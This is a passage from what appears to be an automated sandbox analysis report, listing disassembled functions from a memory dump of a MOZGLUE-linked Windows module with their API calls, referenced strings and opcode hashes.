free.MOZGLUE(?,?,?,?,?,6CCED38A,?), ref: 6CCEDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CCED38A,?), ref: 6CCEDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CCED38A,?), ref: 6CCEDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CCED38A,?), ref: 6CCEDD4A

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 1351d581f3c559cf6e59c896f0e4fb124822586a48fe2f116d06a14fe6c025c9
Instruction ID: 8fa05dde2d362ae4b5c57d5bafb3fa1066c584712b577d55269bb99ffe027e0e
Opcode Fuzzy Hash: 1351d581f3c559cf6e59c896f0e4fb124822586a48fe2f116d06a14fe6c025c9
Instruction Fuzzy Hash: C6417AB5A00215DFCB00CF99C88099ABBF6FF8D304B154469DA46ABB11E771FC01CB90

Function 6CCD6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCFA80: GetCurrentThreadId.KERNEL32 ref: 6CCCFA8D
Part of subcall function 6CCCFA80: AcquireSRWLockExclusive.KERNEL32(6CD1F448), ref: 6CCCFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCD6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CCD67C8

Part of subcall function 6CCE4290: memcpy.VCRUNTIME140(?,?,6CCF2003,6CCF0AD9,?,6CCF0AD9,00000000,?,6CCF0AD9,?,00000004,?,6CCF1A62,?,6CCF2003,?), ref: 6CCE42C4

Strings

data, xrefs: 6CCD6593

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 9ada673126c39dcf82c40db4dee0c5b630c17a13027d38b53afeafb42b389a87
Instruction ID: 1a3281e2597277e2d893efba096f68e8d30dfe79f2a8672385d95a8367aebbfd
Opcode Fuzzy Hash: 9ada673126c39dcf82c40db4dee0c5b630c17a13027d38b53afeafb42b389a87
Instruction Fuzzy Hash: C2D1E075A083408FD724DF69C851B9FB7E5AFC5308F11492EE68987B51EB30E849CB52

Function 6CCECCF0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECDA4

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

Part of subcall function 6CCED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CCECDBA,00100000,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED158
Part of subcall function 6CCED130: InitializeConditionVariable.KERNEL32(00000098,?,6CCECDBA,00100000,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECDC4

Part of subcall function 6CCE7480: ReleaseSRWLockExclusive.KERNEL32(?,6CCF15FC,?,?,?,?,6CCF15FC,?), ref: 6CCE74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECECC

Part of subcall function 6CCACA10: mozalloc_abort.MOZGLUE(?), ref: 6CCACAA2

Part of subcall function 6CCDCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CCECEEA,?,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000), ref: 6CCDCB57
Part of subcall function 6CCDCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CCDCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CCECEEA,?,?), ref: 6CCDCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED058

Strings

ser_pref("browser.urlbar.quicksuggest.migrationVersion", 2);user_pref("browser.urlbar.quicksuggest.scenario", "history");user_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);user_pref("datareporting.policy.dataSubmissionPolicyNotified, xrefs: 6CCECD2C

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID: ser_pref("browser.urlbar.quicksuggest.migrationVersion", 2);user_pref("browser.urlbar.quicksuggest.scenario", "history");user_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);user_pref("datareporting.policy.dataSubmissionPolicyNotified
API String ID: 861561044-4192959871
Opcode ID: 8b809f61d7cf5189a93f65b0e38c47fbf3cd0f3f874c9b2b455c4f1f97a7e1fe
Instruction ID: 313f12aa41b29b96c8bcfe6df8bfa57437201cde4311f222b0e917b1e7cf8ce6
Opcode Fuzzy Hash: 8b809f61d7cf5189a93f65b0e38c47fbf3cd0f3f874c9b2b455c4f1f97a7e1fe
Instruction Fuzzy Hash: 4FD16F71A04B469FD708CF28C480B99F7E1BF89308F05866DD9598B752EB31E9A5CBC1

Function 6CCCD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC9EB57,?,?,?,?,?,?,?,?,?), ref: 6CCCD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC9EB57,?), ref: 6CCCD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC9EB57,?), ref: 6CCCD673
free.MOZGLUE(?), ref: 6CCCD888

Strings

|Enabled, xrefs: 6CCCD81E

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 7de7bd1553655696ab4472ba41d12167bb7c658655a75f3dfc6352ae62ad708b
Instruction ID: 1094f5da8de9aebdc15e89074909945576a4583d6475004b78773cf416577f43
Opcode Fuzzy Hash: 7de7bd1553655696ab4472ba41d12167bb7c658655a75f3dfc6352ae62ad708b
Instruction Fuzzy Hash: 4FA105B0B043458FDB01CF69C4D07AEBBF1AF49318F14845CD899ABB41E735A845CBA2

Function 6CCCF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CCCF480

Part of subcall function 6CC9F100: LoadLibraryW.KERNEL32(shell32,?,6CD0D020), ref: 6CC9F122
Part of subcall function 6CC9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC9F132

CloseHandle.KERNEL32(00000000), ref: 6CCCF555

Part of subcall function 6CCA14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CCA1248,6CCA1248,?), ref: 6CCA14C9
Part of subcall function 6CCA14B0: memcpy.VCRUNTIME140(?,6CCA1248,00000000,?,6CCA1248,?), ref: 6CCA14EF

Part of subcall function 6CC9EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC9EEE3

CreateFileW.KERNEL32 ref: 6CCCF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CCCF523

Strings

\oleacc.dll, xrefs: 6CCCF4CB

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 268254b34e011011669fef19e34f0676599a9c63b77ae9eb85da1fff7c52e93f
Instruction ID: 29c2d4985fc61a64d787081cdf11e1beb6313af04191619328c3f73a96d6b718
Opcode Fuzzy Hash: 268254b34e011011669fef19e34f0676599a9c63b77ae9eb85da1fff7c52e93f
Instruction Fuzzy Hash: CB41A2707187109FE720DF69C884A9BB7F8AF45318F504A1DF69583A50FB30D94ACB92

Function 6CCF74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CCF7526
__Init_thread_footer.LIBCMT ref: 6CCF7566
__Init_thread_footer.LIBCMT ref: 6CCF7597

Strings

UnmapViewOfFile2, xrefs: 6CCF7552
kernel32.dll, xrefs: 6CCF7557

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 4d4364f6eebdc908211302e2d2503a5ba827b4149fe2483e38c7826ef07934a3
Instruction ID: 16afa801f129f83f7a0600b1fc1f92e9e76eeaf13f65154a4db1abeaff87c4d5
Opcode Fuzzy Hash: 4d4364f6eebdc908211302e2d2503a5ba827b4149fe2483e38c7826ef07934a3
Instruction Fuzzy Hash: AB213731705501A7EB15EFE9D819E89377AEF86324B10452DE61547F40E730A807DB92

Function 6CCFC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CCFC0E9), ref: 6CCFC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CCFC437
FreeLibrary.KERNEL32(?,6CCFC0E9), ref: 6CCFC44C

Strings

ntdll.dll, xrefs: 6CCFC413
NtQueryVirtualMemory, xrefs: 6CCFC431

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 6e0fcd09092b49df9760622118cea5a0ce3281ca0bbcb1c07e27832b50d1bdfb
Instruction ID: 9fa42edc2d5aa6006baea541554af6166373ed1b100cdfdd4c9b443a21851fc0
Opcode Fuzzy Hash: 6e0fcd09092b49df9760622118cea5a0ce3281ca0bbcb1c07e27832b50d1bdfb
Instruction Fuzzy Hash: 54E092F4705301ABFB00AF79D90A715BEFCAB06208F004616AB8891F50EBB0C0179B50

Function 6CCF75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CCF748B,?), ref: 6CCF75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CCF75D7
FreeLibrary.KERNEL32(?,6CCF748B,?), ref: 6CCF75EC

Strings

ntdll.dll, xrefs: 6CCF75B3
RtlNtStatusToDosError, xrefs: 6CCF75D1

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 85e967e987ced6405ed3263b54abd8ab5e223d0f1ffc4a8c2264becf2a97bbb7
Instruction ID: 56c0816b230e18ec983f62cb589fa0e88640080660bde908f8a9f42e01fe253e
Opcode Fuzzy Hash: 85e967e987ced6405ed3263b54abd8ab5e223d0f1ffc4a8c2264becf2a97bbb7
Instruction Fuzzy Hash: 1AE092B1604301BBFB01BBA2D84A7017AFCEB06258F204025AB05D1F50EBB4D057CF10

Function 6CCFBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6CCFBE49), ref: 6CCFBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6CCFBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CCFBE49), ref: 6CCFBF38
RtlReAllocateHeap.NTDLL ref: 6CCFBF83
RtlFreeHeap.NTDLL(6CCFBE49,00000000), ref: 6CCFBFA6

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 6d3eaf4d2a94d25946d97f3da85a6ee836fe0920397b91d4d5005a651e4355dd
Instruction ID: 55d8e6ffe1fdc94e555b94476b9d0a65581e1d84716c8970bab900848875ecc8
Opcode Fuzzy Hash: 6d3eaf4d2a94d25946d97f3da85a6ee836fe0920397b91d4d5005a651e4355dd
Instruction Fuzzy Hash: C5518F75B002058FE754CF69CD90BAAB3A2FF88314F298629D525A7B54E730F9078B91

Function 6CC94DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC94E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC94E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC94EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC94F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC94F1E

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: f8ca0473766d56cf521e1725c59e7bb5e11018702dfbca64948743878326171c
Instruction ID: 9cf23ef852a5908461426de697bf63dbbfede0fca1af1c8efdd6a2f914d9b17d
Opcode Fuzzy Hash: f8ca0473766d56cf521e1725c59e7bb5e11018702dfbca64948743878326171c
Instruction Fuzzy Hash: E841D0716087069FC705CF69C48095BF7E4BF89344F108A2DF56687B51EB30E958CB92

Function 6CCA1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA15BC
moz_xmalloc.MOZGLUE(-00000001,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA15E7
free.MOZGLUE(?,?,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CCA152B,?,?,?,?,6CCA1248,?), ref: 6CCA1637

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 6a73fffb5bda5900551bf8199595c5c2e6618f883df8bc92c5036c2248a88b2b
Instruction ID: 07ef8db188b671991b11396f9c6ac3e0535adb7eaa57359d0198bb10aaffa1b9
Opcode Fuzzy Hash: 6a73fffb5bda5900551bf8199595c5c2e6618f883df8bc92c5036c2248a88b2b
Instruction Fuzzy Hash: CF31C771A00516CBC7188EACD85856E76E9FB853747250B2DE423DBBE4FB30D9068791

Function 6CCFAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAD9D

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE01
GetLastError.KERNEL32(?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CD0E330,?,6CCBC059), ref: 6CCFAE3D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: d0b70455c6ab9be867547fe949f746160678387275a149f786eed55471c4eb53
Instruction ID: 355c5daf34f67d9cee036124e18c3c91bb5dd3156edc42fd4b1c4f2ec21168b3
Opcode Fuzzy Hash: d0b70455c6ab9be867547fe949f746160678387275a149f786eed55471c4eb53
Instruction Fuzzy Hash: FF3141B1A002159FDB50DF7A8C44AABB7F8EF88614F158829E95AD7710F734D805CBB1

Function 6CCF5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CD0DCA0,?,?,?,6CCCE8B5,00000000), ref: 6CCF5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCCE8B5,00000000), ref: 6CCF5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CCCE8B5,00000000), ref: 6CCF5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CCCE8B5,00000000), ref: 6CCF5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCCE8B5,00000000), ref: 6CCF5FD6

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 92a160e8a1dc72939a7368fd3eeee15b1306737c57bab01feaa2a7ce0531a4cc
Instruction ID: cbc42b367dd39ef5d468d009f5e0d9a99764311c64a250a8011e0f2afdcf9d67
Opcode Fuzzy Hash: 92a160e8a1dc72939a7368fd3eeee15b1306737c57bab01feaa2a7ce0531a4cc
Instruction Fuzzy Hash: 233132743006009FE754CF29C898E26BBF9FF89359B648598F66687B95D731EC42CB80

Function 6CC9B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CC9B532
moz_xmalloc.MOZGLUE(?), ref: 6CC9B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC9B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC9B57E
free.MOZGLUE(00000000), ref: 6CC9B58F

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 5e5949b7188b2af5d8f7a9e0dcc0d1da5ecd512e20b345a7d22743d585211c1c
Instruction ID: 9f80fe989573b56f59870d716232473e56de7635df367435c994f90e7096fda4
Opcode Fuzzy Hash: 5e5949b7188b2af5d8f7a9e0dcc0d1da5ecd512e20b345a7d22743d585211c1c
Instruction Fuzzy Hash: 6B21E771A00205AFDB108F69CC50BAAFBB9FF85314F284129E918DB751F776D911C7A1

Function 6CCF6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CCF6E78

Part of subcall function 6CCF6A10: InitializeCriticalSection.KERNEL32(6CD1F618), ref: 6CCF6A68
Part of subcall function 6CCF6A10: GetCurrentProcess.KERNEL32 ref: 6CCF6A7D
Part of subcall function 6CCF6A10: GetCurrentProcess.KERNEL32 ref: 6CCF6AA1
Part of subcall function 6CCF6A10: EnterCriticalSection.KERNEL32(6CD1F618), ref: 6CCF6AAE
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CCF6AE1
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CCF6B15
Part of subcall function 6CCF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CCF6B65
Part of subcall function 6CCF6A10: LeaveCriticalSection.KERNEL32(6CD1F618,?,?), ref: 6CCF6B83

MozFormatCodeAddress.MOZGLUE ref: 6CCF6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CCF6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CCF6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CCF6EFF

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

